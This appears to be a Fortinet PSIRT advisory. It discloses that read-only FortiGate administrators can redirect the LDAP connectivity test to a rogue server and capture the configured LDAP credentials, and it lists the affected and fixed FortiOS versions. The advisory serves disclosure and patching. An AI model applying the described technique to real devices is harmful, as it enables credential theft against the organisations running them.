PSIRT Advisory

Read-only admins can obtain LDAP credentials configured in FortiGate using LDAP test connectivity feature


Fortigate's read-only admins are able to point a LDAP server connectivity test request to a rogue LDAP server instead of the configured one, in order to obtain the LDAP server login credentials configured in the FortiGate.


Improper Access Control

Affected Products

FortiOS 6.0.0 -> 6.0.2

FortiOS 5.6.7 and before


Upgrade to FortiOS 5.6.8, 6.0.3 or upcoming 6.2.0


Fortinet is pleased to thank Julio Engels Ureña Martinez for reporting this vulnerability under responsible disclosure.